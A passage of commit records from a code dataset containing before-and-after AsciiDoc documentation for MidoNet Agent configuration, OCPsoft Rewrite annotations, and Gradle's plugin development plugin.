maintaining\nliveness of the datapath and maintaining consistency relative to the\nauthoritative network topology and security policy.\n\nFor L3GW hosts with BGP enabled, the considerations are more difficult. While\nthe MidoNet Agent at the L3GW continues to operate disconnected, it continues to\nannounce routes to its BGP peers. If the disconnection from ZooKeeper is due to\na network partition that also separates the L3GW from a majority of compute\nhosts (rather than ZooKeeper failure\/maintenance), then it is practically\nblack-holing the traffic destined to computes that are outside its partition.\nHence session gracetime presents a tradeoff between increasing L3GW tolerance to\nZooKeeper failure (by increasing gracetime) and reducing duration of traffic\nblackholing (by reducing gracetime).\n\nMidoNet currently does not have a good solution to this tradeoff. In the future\nwe intend to build a blackhole detection mechanism at the L3GW so that it can\nshut down its BGP session during gracetime if it determines that it cannot\ndeliver most of the traffic it receives.\n\n=== Scheduling ZooKeeper maintenance\n\nWhen it's necessary to take all (or a majority) of ZooKeeper Quorum nodes down\nfor maintenance, the best practice is to increase the session_gracetime to a\nvalue higher than the anticipated maintenance. 
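For example, assuming a maintenance window of up to two hours, such a temporary override might look as follows (the value is illustrative and given in milliseconds):\n\n[source]\n----\nzookeeper {\n session_gracetime = 7200000\n}\n----\n\n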
This should be done for all\nMidoNet Agents, both on computes and gateway hosts. After the maintenance event\nthe session_gracetime should be returned to the usual values, targeted at the\ndesired tradeoffs of consistency, ZooKeeper failure-tolerance and blackhole\nduration (see discussion above).\n\n== Cassandra configuration\n\nYou may use the Cassandra configuration section to adjust:\n\n* the database replication factor\n\n* the MidoNet cluster name\n\n[source]\n----\ncassandra {\n servers = <comma separated IPs>\n replication_factor = 1\n cluster = midonet\n}\n----\n\n== Datapath configuration\n\nThe agent uses a pool of reusable buffers to send requests to the datapath. You\nmay use the options in the +agent.datapath+ of mn-conf(1) to tune the pool's size\nand its buffers. One pool is created for each output channel, the settings\ndefined here will apply to each of those pools.\n\nIf you notice decreased performance because packet sizes exceed the maximum\nbuffer size, you can increase the value for the buf_size_kb setting. This\nsetting controls the buffer size (in KB). Be aware that the buffer size puts a\nlimit on the packet size that the MidoNet Agent can send. In a network that\njumbo frames traverse, adjust the size so one buffer will accommodate a whole\nframe, plus enough room for the flow's actions.\n\n== BGP failover configuration\n\nThe default BGP fail-over time is 2-3 minutes. However, you can reduce this time\nby changing some parameters on both ends of the session: in +mn-conf(1)+\n(the MidoNet side) and the remote end BGP peer configuration. The example\nbelow shows how to reduce the BGP fail-over time to one minute on the MidoNet\nside:\n\n[source]\n----\nagent {\n midolman {\n bgp_connect_retry=1\n bgp_holdtime=3\n bgp_keepalive=1\n }\n}\n----\n\nThe settings in mn-conf must match those on the remote end BGP peer configuration.\nFor more information about how to set them, see xref:bgp_failover[].\n","old_contents":"[[midolman_configuration_options]]\n= MidoNet Agent (Midolman) configuration options\n\nThis section covers all configuration options for the MidoNet Agent.\n\nWe don't recommend making changes to the default values, except possibly the\n+zookeeper.session_gracetime+ and +agent.datapath.send_buffer_pool_buf_size_kb+\nsetting values.\n\n[WARNING]\nDo not modify the root key, cluster name, or keyspace unless you know what you\nare doing.\n\n++++\n<?dbhtml stop-chunking?>\n++++\n\n== MidoNet behavior after ZooKeeper cluster failure\n\nNodes running the MidoNet Agent, Midolman, depend on a live ZooKeeper session to\nload pieces of a virtual network topology on-demand and watch for updates to\nthose virtual devices.\n\nWhen ZooKeeper becomes inaccessible, a MidoNet Agent instance will continue\noperating for as long as there's a chance to recover connectivity while keeping\nthe same ZooKeeper session. The amount of operating time is thus dictated by the\nsession timeout, which you can control by editing the zookeeper\nsession_gracetime setting in mn-conf(1).\n\nOnce the session expires, the MidoNet Agent will give up and shut itself down,\nprompting upstart to re-launch it. If the ZooKeeper connection and session are\nrecovered within the session_gracetime, MidoNet Agent operation will resume\nuneventfully. 
The MidoNet Agent will learn of all the updates that happened to\nthe virtual topology while it was disconnected and will update its internal\nstate and flow tables accordingly.\n\nWhile the MidoNet Agent is running disconnected from ZooKeeper, waiting for the\nsession to come back, traffic will still be processed, but with reduced\nfunctionality, as follows:\n\n* The MidoNet Agent will not see updates to the virtual topology, thus packets\nmay be processed with a version of the network topology that's up to\nsession_gracetime too old.\n\n* The MidoNet Agent will be unable to load new pieces of the network topology.\nPackets that traverse devices that had never been loaded on a particular MidoNet\nAgent will error out.\n\n* The MidoNet Agent will not be able to perform or see updates to Address\nResolution Protocol (ARP) tables and Media Access Control (MAC) learning tables.\n\nAs time passes, a disconnected MidoNet Agent will become less and less useful.\nThe trade-offs presented above are key to choosing a sensible session_gracetime\nvalue; the default is 30 seconds.\n\nZooKeeper connectivity is not an issue for the MidoNet API server. The API\nrequests are stateless and will simply fail when there is no ZooKeeper\nconnectivity.\n\n== ZooKeeper configuration\n\nYou may use the ZooKeeper configuration section in +mn-conf(1)+ to adjust:\n\n* the ZooKeeper session timeout value (in milliseconds). This value determines\nwhen the system considers the connection between ZooKeeper and the MidoNet Agent\nto be interrupted.\n\n* the session grace timeout value (in milliseconds). This value determines the\nperiod of time during which the Agent can reconnect to ZooKeeper without causing\nnode outage.\n\n* the root path for MidoNet data.\n\n[source]\n----\nzookeeper {\n zookeeper_hosts = <comma separated IPs>\n session_timeout = 30000\n root_key = \/midonet\/v1\n session_gracetime = 30000\n}\n----\n\n== Cassandra configuration\n\nYou may use the Cassandra configuration section to adjust:\n\n* the database replication factor\n\n* the MidoNet cluster name\n\n[source]\n----\ncassandra {\n servers = <comma separated IPs>\n replication_factor = 1\n cluster = midonet\n}\n----\n\n== Datapath configuration\n\nThe agent uses a pool of reusable buffers to send requests to the datapath. You\nmay use the options in the +agent.datapath+ of mn-conf(1) to tune the pool's size\nand its buffers. One pool is created for each output channel, the settings\ndefined here will apply to each of those pools.\n\nIf you notice decreased performance because packet sizes exceed the maximum\nbuffer size, you can increase the value for the buf_size_kb setting. This\nsetting controls the buffer size (in KB). Be aware that the buffer size puts a\nlimit on the packet size that the MidoNet Agent can send. In a network that\njumbo frames traverse, adjust the size so one buffer will accommodate a whole\nframe, plus enough room for the flow's actions.\n\n== BGP failover configuration\n\nThe default BGP fail-over time is 2-3 minutes. However, you can reduce this time\nby changing some parameters on both ends of the session: in +mn-conf(1)+\n(the MidoNet side) and the remote end BGP peer configuration. 
The example\nbelow shows how to reduce the BGP fail-over time to one minute on the MidoNet\nside:\n\n[source]\n----\nagent {\n midolman {\n bgp_connect_retry=1\n bgp_holdtime=3\n bgp_keepalive=1\n }\n}\n----\n\nThe settings in mn-conf must match those on the remote end BGP peer configuration.\nFor more information about how to set them, see xref:bgp_failover[].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"07ca5455a69b4979c7cbf3ef7a3fab763f2ba0cf","subject":"Typo in index.asciidoc.","message":"Typo in index.asciidoc.\n","repos":"jsight\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/configuration\/annotations\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/configuration\/annotations\/index.asciidoc","new_contents":":toc:\n:toclevels: 4\n\n== Rewrite Annotations\n\ntoc::[]\n\nThe Rewrite annotation support offers an alternative way to configure Rewrite. Compared to configuring\nRewrite using a +ConfigurationProvider+, the annotations allow you to place the configuration very close\nto the affected code, which some people prefer over a central configuration.\n\nPlease note that the Rewrite annotations are not as flexible as a +ConfigurationProvider+.\nThe main focus of the annotations is to simplify the most common use cases which usually occur\nmany times in an application. Good examples of this are +Join+ rules, which are used very often.\n\nNOTE: Of course you can use a +ConfigurationProvider+ and the annotations side by side. \n\n=== Configuration\n\nThe annotation support of Rewrite is enabled by default. So you usually don't have to add any\nadditional configuration to use annotations.\n\nIf you care about the performance of the annotation scanning process, you can tell Rewrite which\npackages to scan for annotations. Restricting the packages may increase performance if you have\na large number of classes in your application.\n\nTo tell Rewrite to scan only a specific package including all subpackages, add the following entry\nto your +web.xml+:\n\n[source,xml]\n.Restrict annotation scanning to a specific package\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>com.example.myapp<\/param-value>\n<\/context-param>\n----\n\nIf you want to disable the annotation scanning completely, set the package to scan to +none+ like this:\n\n[source,xml]\n.Disable annotation scanning\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>none<\/param-value>\n<\/context-param>\n----\n\nBy default Rewrite will only scan the contents of your +\/WEB-INF\/classes+ directory. \nSometimes it makes sense to also scan the JAR files located in\n+\/WEB-INF\/lib+. This may be the case if you are developing a highly modular application\nwhich is split into different JAR files.
\n\nYou can tell Rewrite to also scan the JAR files in +\/WEB-INF\/lib+ by adding the \nfollowing configuration to your +web.xml+: \n\n[source,xml]\n.Tell Rewrite to scan JAR files for annotations\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.SCAN_LIB_DIRECTORY<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n----\n\n=== Defining rules with annotations\n\nOne of the most common Rewrite rule types is the +Join+, which maps a _virtual_ path to a physical \nserver resource. If you are using the +ConfigurationProvider+ way of configuration, adding a join\nusually looks like this:\n\n[source,java]\n.A basic join using the fluent Java API\n----\n.addRule(Join.path(\"\/welcome\").to(\"\/faces\/welcome.xhtml\"))\n----\n\nIf you want to configure this rule using the Rewrite annotations API, you can do it like this:\n\n[source,java]\n.A basic join using Rewrite annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/welcome\", to=\"\/faces\/welcome.xhtml\")\npublic class WelcomePage {\n \/\/ your code\n}\n----\n\nAs you can see in this example, using the Rewrite annotations is straightforward. Just add\na +@Join+ annotation to your class and set the +path+ and +to+ attributes just like you would\nusing the fluent Java API.\n\nTIP: When using web frameworks like JSF, it is recommended to place the annotation on the class\nwhich is mainly responsible for the corresponding page.\n\nIn some cases it is desired to add an additional +Condition+ to a rule. A good example of this\nis additional security checks for a URL. To add such a constraint, just add the corresponding annotation to\nyour class as shown in the following example.\n\n[source,java]\n.Adding a security constraint to a Join\n----\n@Named\n@RequestScoped\n@RolesRequired(\"ADMIN\")\n@Join(path=\"\/users\", to=\"\/faces\/user-list.xhtml\")\npublic class UserListPage {\n \/\/ your code\n}\n----\n\nIn this example the +Join+ rule is only applied if the user has the required JAAS role.\n\nTIP: If Rewrite doesn't provide an existing annotation for your specific use case, you can create your\nown very easily. Have a look at <<custom-annotations,Building custom annotations>> to learn how\nto do this.\n\n\n=== Handling parameters\n\nParameters are a very important concept in Rewrite. They allow you to specify a _dynamic_ part of your\nURL used to identify the resource the user is trying to access.\n\nWhen using the +ConfigurationProvider+ API, you declare parameters like this:\n\n[source,java]\n.A join with parameters\n----\n.addRule(Join.path(\"\/user\/{name}\").to(\"\/faces\/user-details.xhtml\"))\n----\n\nIf you want to define such a rule using Rewrite annotations, add the parameter\nto the path just like you would using the +ConfigurationProvider+:\n\n[source,java]\n.Using parameters with @Join annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\")\npublic class UserDetailsPage {\n \/\/ your code\n}\n----\n\nRewrite will automatically turn the parameter into a query parameter with the same name. So\nyou can access the value simply by calling +HttpServletRequest.getParameter()+:\n\n[source,java]\n.Accessing parameters using the Servlet API\n----\nString username = request.getParameter(\"name\");\n----\n\nOf course it is not very nice to spread such low-level Servlet API calls across your code.
\nTherefore Rewrite also supports _parameter bindings_ which allow you to automatically\ninject the parameter values into managed bean properties.\n\nTo inject the parameters into a property of your bean, just add a +@Parameter+ annotation\nto the corresponding field like this:\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\")\npublic class UserListPage {\n\n @Parameter(\"name\")\n private String username;\n\n}\n----\n\nTIP: If you don't specify the name of the parameter in the annotation, Rewrite will instead \nuse the name of the field. So you don't have to specify the name if the name of the field\nmatches the name of the parameter.\n\n[[parameter-custom-regex-pattern]]\n==== Custom matching patterns\n\nBy default Rewrite parameters will match any character except for the path delimiter +\/+.\nInternally Rewrite uses the regular expression +[^\/]++ for matching the value of the parameter.\nIn some situations it can be useful to customize this pattern. Especially if the standard\npattern matches too greedily or if you want to match more than a single path segment.\n\nIf you want to customize the regular expression used for the matching, just add a +@Matches+\nannotation to the corresponding field. The following class contains a parameter that will\nmatch only lowercase letters and digits.\n\n[source,java]\n.Using @Matches to customize the matching pattern\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\")\npublic class UserListPage {\n\n @Parameter\n @Matches(\"[a-z0-9]+\")\n private String name;\n\n}\n----\n\n==== Custom validation\n\nMany parameter validation requirements can be implemented using regular expressions as shown\nin the <<parameter-custom-regex-pattern,previous section>>. If your validation rules are more\ncomplex, you can use Rewrite's support for custom validators.\n\nA validator must implement the interface +Validator+. The only method in this interface is\ncalled +isValid()+ and must return +true+ if the parameter is valid and +false+ otherwise.\nThe following example shows a validator which validates that the length of a parameter value\nis even.\n\n[source,java]\n.Example for a custom validator\n----\npublic class EvenLengthValidator implements Validator<String>\n{\n\n @Override\n public boolean isValid(Rewrite event, EvaluationContext context, String value)\n {\n return value.trim().length() % 2 == 0;\n }\n\n}\n----\n\nTo use such a custom validator, add a +@Validate+ annotation to your field and refer to the type\nof the validator you wish to use:\n\n[source,java]\n.Using @Validate for custom validation\n----\n@Named\n@RequestScoped\n@Join(path=\"\/some-path\/{value}\", to=\"\/faces\/some-page.xhtml\")\npublic class SomePage {\n\n @Parameter\n @Validate(with = EvenLengthValidator.class)\n private String value;\n\n}\n----\n\nTIP: If you are using the JSF integration module, you can also refer to standard JSF validators without\nthe need to create a Rewrite-specific one. Refer to the JSF integration module documentation\nfor details.\n\n\n\n\n=== Invoking methods\n\nTODO\n\n[[custom-annotations]]\n\n=== Building custom annotations\n\nTODO","old_contents":":toc:\n:toclevels: 4\n\n== Rewrite Annotations\n\ntoc::[]\n\nThe Rewrite annotation support offers an alternative way to configure Rewrite.\n
Compared to configuring\nRewrite using a +ConfigurationProvider+, the annotations allow to place the configuration very close\nto the affected code, which some people prefer over a central configuration.\n\nPlease note that the Rewrite annotations are not as flexible as a +ConfigurationProvider+.\nThe main focus of the annotations is to simplify the most common usecases which usually occur\nmany times in an application. A good example for this are +Join+ rules which are used very often.\n\nNOTE: Of cause you can use a +ConfigurationProvider+ and the annotations side by side. \n\n=== Configuration\n\nThe annotation support of Rewrite is enabled by default. So you usually don't have do add any\nadditional configuration to use annotations.\n\nIf you care about the performance of the annotation scanning process, you can tell Rewrite which\npackages to scan for annotations. Restricting the packages may increase performance if you have\na large number of classes in your application.\n\nTo tell Rewrite to scan only a specific package including all subpackes, add the following entry\nto your +web.xml+:\n\n[source,xml]\n.Restrict annotation scanning to a specific package\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>com.example.myapp<\/param-value>\n<\/context-param>\n----\n\nIf you want to disable the annotation scanning completely, set the package to scan to +none+ like this:\n\n[source,xml]\n.Disable annotation scanning\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>none<\/param-value>\n<\/context-param>\n----\n\nBy default Rewrite will only scan the contents of your +\/WEB-INF\/classes+ directory. \nSometimes it makes sense to also scan the JAR files located in\n+\/WEB-INF\/lib+. This may be the case if your are developing a highly modular application\nwhich is split into different JAR files. \n\nYou can tell Rewrite to also scan the JAR files in +\/WEB-INF\/lib+ by adding the \nfollowing configuration to your +web.xml+: \n\n[source,xml]\n.Tell Rewrite to scan JAR files for annotations\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.SCAN_LIB_DIRECTORY<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n----\n\n=== Defining rules with annotations\n\nOne of the most common Rewrite rule types is the +Join+ which maps a _virtual_ path to a physical \nserver resource. If you are using the +ConfigurationProvider+ way of configuration, adding a join\nusually looks like this:\n\n[source,java]\n.A basic join using the fluent Java API\n----\n.addRule(Join.path(\"\/welcome\").to(\"\/faces\/welcome.xhtml\"))\n----\n\nIf you want to configure this rule using the Rewrite annotations API, you can do it like this:\n\n[source,java]\n.A basic join using Rewrite annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/welcome\", to=\"\/faces\/welcome.xhtml\")\npublic class WelcomePage {\n \/\/ your code\n}\n----\n\nAs you can see in this example, using the Rewrite annotations is straight forward. Just add\na +@Join+ annotation to your class and set the +path+ and +to+ attributes just like you would\nusing the fluent Java API.\n\nTIP: When using web frameworks like JSF, it is recommended to place the annotation on the class\nwhich is mainly responsible for the corresponding page.\n\nIn some cases it is desired to add an additional +Condition+ to a rule. A good example for this\nare additional security checks for an URL. 
To add such a constraint, just add the corresponding annotation to\nyour class like shown in the following example.\n\n[source,java]\n.Adding a security constraint to a Join\n----\n@Named\n@RequestScoped\n@RolesRequired(\"ADMIN\")\n@Join(path=\"\/users\", to=\"\/faces\/user-list.xhtml\")\npublic class UserListPage {\n \/\/ your code\n}\n----\n\nIn this example the +Join+ rules is only applied if the user as the required JAAS role.\n\nTIP: If Rewrite doesn't provide an existing annotation for your specific usecase, you can create your\nown one very easily. Have a look at <<custom-annotations,Building custom annotations>> to learn how\nto do this.\n\n\n=== Handling parameters\n\nParameters are a very important concept in Rewrite. They allow you to specify a _dynamic_ part of your\nURL used to identify the resource the user is trying to access.\n\nWhen using the +ConfigurationProvider+ API, you declare parameters like this:\n\n[source,java]\n.A join with parameters\n----\n.addRule(Join.path(\"\/user\/{name}\").to(\"\/faces\/user-details.xhtml\"))\n----\n\nIf you want to define such a rule using Rewrite annotations, add the parameter\nto the path just like you would using the +ConfigurationProvider+:\n\n[source,java]\n.Using parameters with @Join annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserDetailsPage {\n \/\/ your code\n}\n----\n\nRewrite will automatically turn the parameter into a query parameter with the same name. So\nyou can access the value simply by calling +HttpServletRequest.getParameter()+:\n\n[source,java]\n.Accessing parameters using the Servlet API\n----\nString username = request.getParameter(\"name\");\n----\n\nOf cause it is not very nice to spread such low level Servlet API calls across your code. \nTherefore Rewrite also supports _parameter bindings_ which allow you to automatically\ninject the parameter values into managed bean properties.\n\nTo inject the parameters into a property of you bean, just add a +@Parameter+ annotation\nto the corresponding field like this:\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserListPage {\n\n @Parameter(\"name\")\n private String username;\n\n}\n----\n\nTIP: If you don't specify the name of the parameter in the annotation, Rewrite will instead \nuse the name of the field. So you don't have to specify the name if the name of the field\nmatches the name of the parameter.\n\n[[parameter-custom-regex-pattern]]\n==== Custom matching patterns\n\nBy default Rewrite parameters will match any character except for the path delimiter +\/+.\nInternally Rewrite uses the regular expression +[^\/]++ for matching the value of the parameter.\nIn some situations it can be useful to customize this pattern. Especially if the standard\npattern matches too greedy or if you want to match more than a single path segment.\n\nIf you want to customize the regular expression used for the matching, just add a +@Matches+\nannotation to the corresponding field. 
The following class contains a parameter that will\nmatch only lowercase letters and digits.\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserListPage {\n\n @Parameter\n @Matches(\"[a-z0-9]+\")\n private String name;\n\n}\n----\n\n==== Custom validation\n\nMany parameter validation requirements can be implemented using regular expressions like shown\nin the <<parameter-custom-regex-pattern,previous section>>. If your validation rules are more\ncomplex, you can use Rewrite's support for custom validators.\n\nA validator must implement the interface +Validator+. The only method in this interface is\ncalled +isValid()+ and must return +true+ if the parameter is valid and +false+ otherwise.\nThe following example shows an validator which validates that the length of a parameter value\nis even.\n\n[source,java]\n.Example for a custom validator\n----\npublic class EvenLengthValidator implements Validator<String>\n{\n\n @Override\n public boolean isValid(Rewrite event, EvaluationContext context, String value)\n {\n return value.trim().length() % 2 == 0;\n }\n\n}\n----\n\nTo use such a custom validator, add a +@Validate+ annotation to your field and refer to the type\nof the validator you wish to use:\n\n[source,java]\n.Using @ValidateWith for custom vaidation\n----\n@Named\n@RequestScoped\n@Join(path=\"\/some-path\/{value}\", to=\"\/faces\/some-page.xhtml\"\")\npublic class SomePage {\n\n @Parameter\n @Validate(with = EvenLengthValidator.class)\n private String value;\n\n}\n----\n\nTIP: If you are using the JSF integration module, you can also refer to standard JSF validators without\nthe need to create a Rewrite-specific one. 
Refer to the JSF integration module documentation\nfor details.\n\n\n\n\n=== Invoking methods\n\nTODO\n\n[[custom-annotations]]\n\n=== Building custom annotations\n\nTODO","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dcbe6891812a5dc8fd9f023fdbd2c9044adddac","subject":"Enforce one sentence per line","message":"Enforce one sentence per line\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/core-plugins\/java_gradle_plugin.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/core-plugins\/java_gradle_plugin.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[java_gradle_plugin]]\n= Gradle Plugin Development Plugin\n\nThe Java Gradle Plugin development plugin can be used to assist in the development of Gradle plugins.\nIt automatically applies the <<java_library_plugin.adoc#java_library_plugin,Java Library (`java-library`)>> plugin, adds the `gradleApi()` dependency to the `api` configuration and performs validation of plugin metadata during `jar` task execution.\n\nThe plugin also integrates with <<test_kit.adoc#test_kit,TestKit>>, a library that aids in writing and executing functional tests for plugin code.\nIt automatically adds the `gradleTestKit()` dependency to the `testImplementation` configuration and generates a plugin classpath manifest file consumed by a `GradleRunner` instance if found.\nPlease refer to <<test_kit.adoc#sub:test-kit-automatic-classpath-injection,Automatic classpath injection with the Plugin Development Plugin>> for more on its usage, configuration options and samples.\n\n\n[[sec:gradle_plugin_dev_usage]]\n== Usage\n\nTo use the Java Gradle Plugin Development plugin, include the following in your build script:\n\n.Using the Java Gradle Plugin Development plugin\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=use-java-gradle-plugin-plugin]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=use-java-gradle-plugin-plugin]\"]\n====\n\nApplying the plugin automatically applies the <<java_library_plugin.adoc#java_library_plugin,Java Library (`java-library`)>> plugin and adds the `gradleApi()` dependency to the `api` configuration.\nIt also adds some validations to the build.\n\nThe following validations are performed:\n\n* There is a plugin descriptor defined for the plugin.\n* The plugin descriptor contains an `implementation-class` property.\n* The `implementation-class` property references a valid class file in the jar.\n* Each property getter or the corresponding field must be annotated with a property annotation like `@InputFile` and `@OutputDirectory`.\nProperties that don't participate in up-to-date checks should be annotated with `@Internal`.
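\n\nTo make the last rule concrete, here is a minimal sketch of a task type whose properties would pass these validations. The class and property names are illustrative and not part of this plugin's API:\n\n[source,java]\n.An illustrative task type with annotated properties\n----\nimport org.gradle.api.DefaultTask;\nimport org.gradle.api.file.DirectoryProperty;\nimport org.gradle.api.file.RegularFileProperty;\nimport org.gradle.api.provider.Property;\nimport org.gradle.api.tasks.InputFile;\nimport org.gradle.api.tasks.Internal;\nimport org.gradle.api.tasks.OutputDirectory;\nimport org.gradle.api.tasks.TaskAction;\n\npublic abstract class GenerateDocsTask extends DefaultTask {\n\n @InputFile \/\/ participates in up-to-date checks\n public abstract RegularFileProperty getSource();\n\n @OutputDirectory \/\/ participates in up-to-date checks\n public abstract DirectoryProperty getOutputDir();\n\n @Internal \/\/ explicitly excluded from up-to-date checks\n public abstract Property<String> getLogLabel();\n\n @TaskAction\n void generate() {\n \/\/ task logic goes here\n }\n}\n----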
\n\nAny failed validations will result in a warning message.\n\nFor each plugin you are developing, add an entry to the `gradlePlugin {}` script block:\n\n.Using the gradlePlugin {} block.\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=gradle-plugin-block]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=gradle-plugin-block]\"]\n====\n\nThe `gradlePlugin {}` block defines the plugins being built by the project including the `id` and `implementationClass` of the plugin.\nFrom this data about the plugins being developed, Gradle can automatically:\n\n* Generate the plugin descriptor in the `jar` file's `META-INF` directory.\n* Configure the <<plugins.adoc#sec:plugin_markers,Plugin Marker Artifact>> publications (Maven or Ivy) for each plugin.\n* Publish each plugin to the Gradle Plugin Portal (see <<publishing_gradle_plugins.adoc#publishing_portal,Publishing Plugins to Gradle Plugin Portal>> for details), but only if the link:https:\/\/plugins.gradle.org\/docs\/publish-plugin[Plugin Publishing Plugin] has also been applied.\n\n[[sec:gradle_plugin_dev_interactions]]\n== Interactions\n\nSome of the plugin's behaviour depends on other, related plugins also being applied in your build, namely the <<publishing_maven.adoc#publishing_maven,Maven Publish (`maven-publish`)>> and <<publishing_ivy.adoc#publishing_ivy,Ivy Publish (`ivy-publish`)>> plugins.\n\nOther plugins auto-apply the Java Gradle Plugin, like the link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish[Plugin Publishing Plugin].\n\n=== Maven Publish Plugin\n\nWhen the Java Gradle Plugin (`java-gradle-plugin`) detects that the Maven Publish Plugin (`maven-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.maven.MavenPublication.html[MavenPublications]:\n\n* a single \"main\" publication, named `pluginMaven`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerMaven` (for example in the above example it would be `simplePluginPluginMarkerMaven`)
\n\nThis automatic configuration happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Ivy Publish Plugin\n\nWhen the Java Gradle Plugin (`java-gradle-plugin`) detects that the Ivy Publish Plugin (`ivy-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.ivy.IvyPublication.html[IvyPublications]:\n\n* a single \"main\" publication, named `pluginIvy`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerIvy` (for example in the above example it would be `simplePluginPluginMarkerIvy`)\n\nThis automatic configuration happens in a\n
Properties that don't participate in up-to-date checks should be annotated with `@Internal`.\n\nAny failed validations will result in a warning message.\n\nFor each plugin you are developing, add an entry to the `gradlePlugin {}` script block:\n\n.Using the gradlePlugin {} block.\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=gradle-plugin-block]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=gradle-plugin-block]\"]\n====\n\nThe `gradlePlugin {}` block defines the plugins being built by the project including the `id` and `implementationClass` of the plugin. From this data about the plugins being developed, Gradle can automatically:\n\n* Generate the plugin descriptor in the `jar` file's `META-INF` directory.\n* Configure the <<plugins.adoc#sec:plugin_markers,Plugin Marker Artifact>> publications (Maven or Ivy) for each plugin.\n* Publish each plugin to the Gradle Plugin Portal (see <<publishing_gradle_plugins.adoc#publishing_portal,Publishing Plugins to Gradle Plugin Portal>> for details), but only if the link:https:\/\/plugins.gradle.org\/docs\/publish-plugin[Plugin Publishing Plugin] has also been applied.\n\n[[sec:gradle_plugin_dev_interactions]]\n== Interactions\n\nSome of the plugin's behaviour depends on other, related plugins also being applied in your build, namely the <<publishing_maven.adoc#publishing_maven,Maven Publish (`maven-publish`)>> and <<publishing_ivy.adoc#publishing_ivy,Ivy Publish (`ivy-publish`)>> plugins.\n\nOther plugins auto apply the Java Gradle Plugin, like the link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish[Plugin Publishing Plugin].\n\n=== Maven Publish Plugin\n\nWhen the Java Gradle Plugin (`java-gradle-plugin`) detects that the Maven Publish Plugin (`maven-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.maven.MavenPublication.html[MavenPublications]:\n\n* a single \"main\" publication, named `pluginMaven`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the 